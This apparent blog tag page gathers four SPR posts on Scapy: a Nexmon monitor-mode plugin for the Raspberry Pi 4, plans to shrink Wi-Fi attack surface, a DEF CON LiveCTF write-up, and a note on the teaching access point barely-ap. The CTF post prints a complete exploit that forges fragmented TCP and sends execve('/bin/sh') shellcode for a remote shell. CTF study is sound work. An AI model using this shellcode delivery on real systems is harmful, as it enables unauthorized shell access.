Skip to main content

4 posts tagged with "Scapy"

View All Tags

· 5 min read

The built-in wifi radio on a Raspberry Pi 4 is kind of sad, as it does not support monitor mode. Luckily the hackers at Seemo Labs have fixed this.

In this post we'll describe how to load Seemoo's Nexmon onto a pi4 running a modern kernel, and package it into a SPR Plugin named spr-nexmon. We'll demonstrate that packet capture and injection works.

First, we will copy the template plugin

$ cp -R super/api_sample_plugin/ spr-nexmon

Development

Prebuilt binaries

We'll use some prebuilt binaries that include

  • the nexmon firmware build for the broadcom wifi radio
  • the 6.2 kernel build
  • the nexutil binary

These were built from the 6.1/6.2 support pull-request

$ cp -R ../nexmon/binaries spr-nexmon/binaries

Docker preparations

We'll update the Dockerfile to include some useful tools and build the project.

FROM ubuntu:23.04 as builder
ENV DEBIAN_FRONTEND=noninteractive
RUN apt-get update
RUN apt-get install -y --no-install-recommends nano ca-certificates git curl
RUN mkdir /code
WORKDIR /code
ARG TARGETARCH
RUN curl -O https://dl.google.com/go/go1.20.linux-${TARGETARCH}.tar.gz
RUN rm -rf /usr/local/go && tar -C /usr/local -xzf go1.20.linux-${TARGETARCH}.tar.gz
ENV PATH="/usr/local/go/bin:$PATH"
COPY code/ /code/

ARG USE_TMPFS=true
RUN --mount=type=tmpfs,target=/tmpfs \
[ "$USE_TMPFS" = "true" ] && ln -s /tmpfs /root/go; \
go build -ldflags "-s -w" -o /nexmon_plugin /code/nexmon_plugin.go


FROM ghcr.io/spr-networks/container_template:latest
ENV DEBIAN_FRONTEND=noninteractive
RUN apt-get update && apt-get install -y --no-install-recommends tcpdump kmod iw wireless-regdb && rm -rf /var/lib/apt/lists/*
COPY scripts /scripts/
COPY --from=builder /nexmon_plugin /
COPY binaries/ nexmon/
ENTRYPOINT ["/scripts/startup.sh"]

We also want this container to use the host network and be privileged so it can load kernel modules. And we'll also set it to restart automatically

And heres the docker-compose.yml:

version: '3.4'

x-logging:
&default-logging
driver: journald

x-labels:
&default-labels
org.supernetworks.ci: ${CI:-false}
org.supernetworks.version: ${RELEASE_VERSION:-latest}${RELEASE_CHANNEL:-}

services:
nexmon:
container_name: supernexmon
build:
context: .
labels: *default-labels
logging: *default-logging
restart: always
network_mode: host
privileged: true
volumes:
- /etc/timezone:/etc/timezone:ro
- /etc/localtime:/etc/localtime:ro
- /lib/firmware/cypress/:/lib/firmware/cypress/
- "${SUPERDIR}./state/plugins/nexmon:/state/plugins/nexmon"
- "${SUPERDIR}./state/public/:/state/public/:ro"

Extending the SPR API

The Nexmon patch breaks the ability to change channels normally. Instead, we can do it with the 'nexutil' binary that nexmon provides.

We'll rename sample_plugin.go to nexmon_plugin.go and define a new function

func changeChannel(w http.ResponseWriter, r *http.Request) {
channel := r.URL.Query().Get("channel")

// Use regexp.MatchString to check if the input matches the pattern
matches, err := regexp.MatchString("^[0-9/]*$", channel)
if err != nil || !matches {
http.Error(w, "Invalid channel string", 400)
return
}

err = exec.Command("/nexmon/nexutil", "-k"+channel).Run()
if err != nil {
http.Error(w, err.Error(), 400)
return
}
}
//...
func main() {
//...
unix_plugin_router.HandleFunc("/change_channel", changeChannel).Methods("PUT")
}

Updating the startup script

When the container runs, we'll have it make sure the seemo firmware and kernel module are loaded fresh.

startup.sh:

#!/bin/bash

cd /nexmon
cp brcmfmac43455-sdio.bin /lib/firmware/cypress/cyfmac43455-sdio-standard.bin

rmmod brcmfmac_wcc
rmmod brcmfmac

insmod brcmfmac.ko

sleep 1

iw phy `iw dev wlan0 info | awk '/wiphy/ {printf "phy" $2}'` interface add mon0 type monitor

echo [+] Loaded

cd /
/nexmon_plugin

Loading

After building, with docker compose build, we'll configure the API to load the plugin.

In the UI or by modifying configs/base/api.json, add the nexmon plugin*

{
"Name": "nexmon",
"URI": "nexmon",
"UnixPath": "/state/plugins/nexmon/socket",
"Enabled": true,
"Plus": false,
"GitURL": "",
"ComposeFilePath": ""
}

Start the plugin with

SUPERDIR=/home/spr/super/ docker compose up -d

Testing

Running tcpdump should show captured 802.11 packets from the environment

# tcpdump -i wlan0 ...

tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on wlan0, link-type IEEE802_11_RADIO (802.11 plus radiotap header), snapshot length 262144 bytes
22:50:27.005540 1876482302us tsft 1.0 Mb/s 2412 MHz 11b -68dBm signal 0dBm noise Beacon (wifi-2.4) [1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0 Mbit] ESS CH: 1, PRIVACY
22:50:27.046106 1876522917us tsft 1.0 Mb/s 2412 MHz 11b -46dBm signal 0dBm noise Beacon (wifi-2.4) [1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0 Mbit] ESS CH: 1, PRIVACY
22:50:27.107930 1876584711us tsft 1.0 Mb/s 2412 MHz 11b -70dBm signal 0dBm noise Beacon (wifi-2.4) [1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0 Mbit] ESS CH: 1, PRIVACY
22:50:27.148500 1876625317us tsft 1.0 Mb/s 2412 MHz 11b -46dBm signal 0dBm noise Beacon (wifi-2.4) [1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0 Mbit] ESS CH: 1, PRIVACY
22:50:27.210323 1876687100us tsft 1.0 Mb/s 2412 MHz 11b -67dBm signal 0dBm noise Beacon (wifi-2.4) [1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0 Mbit] ESS CH: 1, PRIVACY

We can also verify that our channel switch api extension works

# curl -u admin:admin localhost/plugins/nexmon/change_channel?channel=4/20 -X PUT
# iw dev

phy#10
Interface wlan0
ifindex 44
wdev 0xa00000002
addr 00:00:00:00:00:00
type monitor
channel 4 (2427 MHz), width: 20 MHz, center1: 2427 MHz
Interface mon0
ifindex 43
wdev 0xa00000001
addr e4:5f:01:fd:a1:76
type managed
channel 4 (2427 MHz), width: 20 MHz, center1: 2427 MHz
txpower 31.00 dBm
...

* Note that the SPR UI does not allow specifying a docker compose path directly from the UI. Instead, a user can modify or create a list in configs/base/custom_compose_paths.json to do so.

Running barely-ap

Besides sniffing traffic, we can also do wild things with packet injection, like running a WPA2 Access Point written in scapy

Since the nexmon patch is a bit hacky, we set the wlan0 mac address ourselves and make sure the channel matches

ap = AP("turtlenet", "password1234", mode="iface", iface="wlan0", mac="e4:5f:01:cd:a1:76", channel=4)

“ET VOILÀ!”:

root@wifilab0:~/barely-ap/src# python3 ap.py                                                                                                                  
command failed: Device or resource busy (-16)
Created TUN interface scapyap at 10.10.10.1. Bind it to your services if needed.
Sending Authentication to 56:66:a3:9c:71:8b from e4:5f:01:cd:a1:76 (0x0B)...
Sending Association Response (0x01)...
sent eapol m1 56:66:a3:9c:71:8b
[+] New associated station 56:66:a3:9c:71:8b for bssid e4:5f:01:cd:a1:76

Want to try it yourself on SPR?

You can grab spr-nexmon here and barely-ap at https://github.com/spr-networks/barely-ap.

· 3 min read

Reducing Attack Surfaces (Part 1)

SPR lets users create adaptive, micro-segmented networks for connecting and managing devices. In addition to fine-grained network visibility we also build hardened software and work to avoid common security flaws. As SPR has matured we've started taking on further efforts to eliminate attack surfaces.

When it comes to native code: we introduce none. As in, we have not written new native code for SPR anywhere. We have one BPF filter, and its otherwise golang all the way down. We also do not run standard native services where we can avoid them. We have replaced traditional C code for services such as DNS and DHCP with golang implementations, namely CoreDNS and CoreDHCP.

The remaining native code targets that we have in SPR are as follows:

  • The Linux kernel. For example: ethernet, the tcp/ip stack, nftables, the mac80211 framework and vendor drivers
  • 802.11 Firmware, Ethernet Firmware
  • Hostapd
  • PPP Daemon (off by default)
  • OS Services (Ubuntu)

Targeting the Whole WiFi Stack

We believe the wifi firmware to be today's most insecure target (along with the vendor drivers). Many firmwares are blackbox, poorly documented, and opaque to public security research. We want SPR to be immune to attacks like Broadpwn and Qualcomm Exploitation.

We've previously published barely-ap to teach people about WiFi authentication. It can and does work with real wifi chips running in monitor mode to connect clients over the air. We've tested with Android, iOS, and Linux devices.

The plan is to build a series of experiments to host high-speed wifi.

In the near term:

  1. Develop a Proof-of-Concept AP with scapy in monitor mode (DONE)
  2. Develop a shim from monitor frames to hostapd running under mac80211_hwsim. This is a work in progress. We would like to see a rust kernel driver/userland daemon for this

Future:

  1. A full AP written in rust, operating on raw 802.11 frames (not relying on the Linux kernel 802.11 subsystem)
  2. Rust protocol firmware for a wifi chip.

Developing a Shim Explained

By running the card in monitor mode, protocol parsing in the card firmware is substantially reduced if not altogether eliminated.

And with relaying frames over to macsim, hostapd is good to go. What needs to happen however is making this incredibly fast, and researching rate negotiation and what calls might need to be made to firmware to enable higher coding rates.

By using hostapd and the kernel mac80211 stack, we still maintain some native attack surface, however we get a known working, security-tested AP that will be compatible with a wide variety of devices, without the firmware protocol parsing and the vendor driver parsing.

For next steps, a proof-of-concept with scapy is actually much too slow. We want to start with a rust userland daemon leveraging iouring. If that doesn't fly then we'll go to a shim in the kernel.

Interested in working with us? Please reach out

We are actively seeking an intern to help develop rust+wifi for SPR.

You can contact us at spr-wifi [ a-t ] supernetworks.org or hop on the discord

· 6 min read

Noppenheimer

At Defcon CTF Finals, the Final round of LiveCTF went into sudden death. The challenge was named Noppenheimer, a play on the Oppenheimer film that was released, and NOP (NO-OP) instructions.

Contestants had to turn a random sequence of bytes into a gadget/shellcode cave by converting bytes into NOPs, by sending "nuke" Launch commands.

Options:
LAUNCH x,y - Launch a test at position x,y
VIEW - See state of test site
ENDTEST - Conclude testing
>

Both teams solved locally. But they couldn't exploit Noppenheimer against the remote system.

What Went Wrong

Teams used a single read/recv syscall to receive to get shellcode to run. Without any delays in the program, the call will return quickly and if the payload is larger than the MTU it will return partial TCP data. The payloads were crashing on the remote end as they didn't have working shellcode.

As @ZetaTwo and @psifertex explain, the conditions which cause this are highly specific to the exploit with payload length, delays, and other factors. The testers exploits didnt trigger this problem.

Solving with IP Fragmentation

IP Packets can be fragmented into multiple packets when they exceed the MTU size, which is the maximum amount of octets accepted at layer 2 on Ethernet.

By sending fragments in reverse order, it can be ensured that the recv/read call will get all of the data that has been sent, even beyond the MTU size.

Here is a python solution that combines scapy with pwntools, to run inside of a container, which does just that.

As a bonus, it also includes a semi-working TCP implementation written in pure scapy/python.

#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
# Author: [email protected] <github.com/lts-rad>
'''
Demo of TCP w/ sending fragmented payloads with scapy.

Run this code inside of a namespace/container. Since Linux sends RST for forged SYN packets,
this code will use iptables to block them.

#> iptables -A OUTPUT -p tcp --tcp-flags RST RST -s <src_ip> -j DROP
'''
from scapy.all import *
import logging
from pwn import *

logger = logging.getLogger(__name__)
#logging.basicConfig(level=logging.DEBUG)
#logger.setLevel(logging.DEBUG)

class TcpHandshake(object):

class RLoop(threading.Thread):
def __init__(self, tcp):
threading.Thread.__init__(self)
self.tcp = tcp

def handle_recv(self, pkt):
if pkt and pkt.haslayer(IP) and pkt.haslayer(TCP):
if pkt[TCP].flags & 0x3f == 0x12: # SYN+ACK
logger.debug("RCV: SYN+ACK")
self.tcp.send_synack_ack(pkt)
return
elif pkt[TCP].flags & 4 != 0: # RST
logger.debug("RCV: RST")
#raise Exception("RST")
self.tcp.abort = True
return
elif pkt[TCP].flags & 0x1 == 1: # FIN
logger.debug("RCV: FIN")
self.tcp.send_finack(pkt)
return
elif pkt[TCP].flags.A: # ACK came in?
logger.debug("RCV: ACK")
self.tcp.send_base = pkt[TCP].ack

logger.debug("RCV: %s"%repr(pkt))
if len(pkt[TCP].payload) > 0:
self.tcp.Q += [bytes(pkt[TCP].payload)]
self.tcp.send_ack(pkt)

#great, got an ack, check the send queue for pending data
while len(self.tcp.send_queue) > 0:
ret = self.tcp.send_data(self.tcp.send_queue.pop(0))
if ret == False:
break

return
else:
logger.debug("? Unhandled packet")
return


def run(self):
ans = sniff(filter="tcp port %s"%self.tcp.target[1], lfilter=self.tcp.match_packet, prn=self.handle_recv, store=False)

def __init__(self, target, sport=31337):
self.seq = 0
self.seq_next = 0
self.target = target
self.dst = next(iter(Net(target[0])))
self.dport = target[1]
self.sport = sport #random.randrange(0, 2**16)
self.seq_start = random.randrange(0, 2**32)
# options=[('WScale', 7)]
self.l4 = IP(version=4,dst=target[0])/TCP(sport=self.sport, dport=self.dport, flags=0,
seq=self.seq_start, window=65535)
self.src = self.l4.src
self.Q = []
self.abort = False


self.send_base = self.l4[TCP].seq
self.send_window = self.l4[TCP].window
self.last_sent = self.send_base
self.send_queue = []

self.last_ack = 0

#let underlying handle ethernet
self.s = conf.L3socket()

self.R = self.RLoop(self)
self.R.start()
logger.debug("init: %s"%repr(target))

def start(self):
logger.debug("start")
return self.send_syn()

def match_packet(self, pkt):
if pkt.haslayer(IP) and pkt[IP].dst == self.l4[IP].src \
and pkt.haslayer(TCP) and pkt[TCP].dport == self.sport:
if pkt[TCP].ack <= self.seq_next and pkt[TCP].ack >= self.seq_start:
return True
else:
logger.debug("ack was %d expected %d" % (pkt[TCP].ack, self.seq_next))
return False

def send_syn(self):
logger.debug("SND: SYN")
self.l4[TCP].flags = "S"
self.seq_next = self.l4[TCP].seq + 1
self.s.send(self.l4)
self.l4[TCP].seq += 1

def send_synack_ack(self, pkt):
logger.debug("SND: SYN+ACK -> ACK with ack # %d" % (pkt[TCP].seq + 1))
self.l4[TCP].ack = pkt[TCP].seq + 1
self.l4[TCP].flags = "A"
self.seq_next = self.l4[TCP].seq
self.s.send(self.l4)

def send_data(self, d):
if self.abort == True:
print("[-] not sending data, aborted !!!")
return False
self.l4[TCP].flags = "PA"

available = self.send_base + self.send_window - self.last_sent

if available == 0:
self.send_queue += [d]
# have to wait
return False
assert available >= 0

if available < len(d):
d, chop = d[:available], d[available:]
self.send_queue += [chop]

self.seq_next = self.l4[TCP].seq + len(d)
self.last_sent = self.seq_next
tosend = self.l4/d

self.s.send(tosend)
self.l4[TCP].seq += len(d)
return True

def send_frag_data(self, d, sz):
if self.abort == True:
print("[-] not sending data, aborted !!!")
return
assert sz >= 8
self.l4[TCP].flags = "PA"

#tbd send window handling for fragments(?)
dat = self.l4/d
fragments = fragment(dat, sz)
for f in fragments[::-1]:
self.s.send(f)

self.seq_next = self.l4[TCP].seq + len(d)
self.last_sent = self.seq_next
self.l4[TCP].seq += len(d)
return True

def send_fin(self):
logger.debug("SND: FIN")
self.l4[TCP].flags = "F"
self.seq_next = self.l4[TCP].seq + 1
self.s.send(self.l4)
self.l4[TCP].seq += 1

def send_rst(self):
logger.debug("SND: RST")
self.l4[TCP].flags = "R"
self.seq_next = self.l4[TCP].seq + 1
self.s.send(self.l4)
self.l4[TCP].seq += 1

def send_finack(self, pkt):
logger.debug("SND: FIN+ACK")
self.l4[TCP].flags = "FA"
self.l4[TCP].ack = pkt[TCP].seq + 1
self.seq_next = self.l4[TCP].seq + 1
self.s.send(self.l4)
self.l4[TCP].seq += 1
#raise Exception("FIN+ACK")
self.abort = True

def send_ack(self, pkt):
self.l4[TCP].flags = "A"

self.last_ack = pkt[TCP].ack
to_acknowledge = len(pkt[TCP].payload)
#logger.debug("SND: ACK with ack # %d" % (pkt[TCP].seq + len(pkt[TCP].load)))

if to_acknowledge != 0:
self.l4[TCP].ack = pkt[TCP].seq + to_acknowledge
self.s.send(self.l4)

def recv(self, timeout):
elapsed = 0
while (timeout != 0) and (elapsed < timeout):
if len(self.Q) > 0:
retval = self.Q.pop(0)
return retval
time.sleep(0.01)
elapsed += 0.
#returning nothing
return ""

def clear_recv(self):
self.Q = []

def wait_all_acks(self, timeout=0):
elapsed = 0
delta = 0.1
while (timeout != 0) and (elapsed < timeout):
if self.last_ack == self.seq_next and len(self.send_queue) == 0:
return True
time.sleep(delta)
elapsed += delta
return False



if __name__== '__main__':
sport = random.randint(40000, 60000)
os.system("iptables -F OUTPUT")
os.system("iptables -A OUTPUT -p tcp --sport %d --tcp-flags RST RST -j DROP"%sport)
conf.verb = 0

tcp_hs = TcpHandshake(("172.17.0.2", 31337), sport=sport)

r = tubes.sock.sock()
r.send = tcp_hs.send_data
r.recv = tcp_hs.recv
tcp_hs.start()

tosend = b""
def nuke(offset):
global tosend
# scapy send is slow. to speed it up,
# chunk the commands
if len(tosend) > 400:
r.send(tosend)
tosend = b""

tosend += b'LAUNCH %d,%d\n'%(offset%0x10,offset//0x10)

def nukes(a, b):
for i in range(a, b):
nuke(i)


nukes(0, 0x40)
nukes(0x50, 0x58)
nukes(0x5b, 0x60)
nukes(0x70, 0xb0)
nukes(0xc0, 0xc3)

nukes(0xc6, 0xc7)
nukes(0xca, 0xd0)
nuke(0xdc)
nukes(0xe0, 0xec)
nukes(0xed, 0xf0)

nukes(0x108, 0x10c)
nukes(0x10d, 0x473)
nukes(0x495, 0xc17)
nuke(0)

if tosend:
r.send(tosend)

tosend = b'ENDTEST\n'
r.send(tosend)

context.arch = 'amd64'
sc = b'\x90\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05'

print("******** sending shellcode ***********")
d = b'\x90' * (0xd00+200) + sc

tcp_hs.send_frag_data(d, 100)
#raw_input()

r.recvuntil(b'ENDTEST')

#raw_input("Ready?")
print("Waiting for data to come in...")
time.sleep(2)
tcp_hs.clear_recv()
print("[+] Good")

try:
r.interactive()
except:
print('aborted')

print("over")
raw_input()
os.system("iptables -F OUTPUT")
tcp_hs.send_fin()
tcp_hs.send_rst()
FROM python:3.8-slim

# Set the working directory
WORKDIR /app

# Install system dependencies
RUN apt-get update && apt-get install -y libpcap-dev

# Install Scapy using pip
RUN pip install scapy pwntools
RUN pip uninstall pyelftools -y
RUN pip install pyelftools==0.29

RUN apt-get install -y iptables net-tools
RUN apt-get install -y tmux tcpdump iproute2
COPY connect.py .

ENTRYPOINT ["/app/connect.py"]

· One min read

Introducing Barely AP

We've published barely an implementation of a WiFi 802.11 Access Point, using Scapy to teach people about WiFi authentication.

What

On Linux, this code lets you spin up a python access point over monitor mode. It implements features like handling probe requests, authentication, association, and reassociation, and encryption and decryption of data using CCMP (Counter Mode Cipher Block Chaining Message Authentication Code Protocol).

Note

This code just barely gets the job done -- it should NOT be used as a reference for writing production code. It has NO protocol security, as it is not security robust despite performing authenticated CCMP encryption.

Usage:

Building & running

./build.sh
./setup.sh

Inspect IP traffic


docker exec -it barely-ap tcpdump -i scapyap
docker exec -it barely-sta tcpdump -i wlan1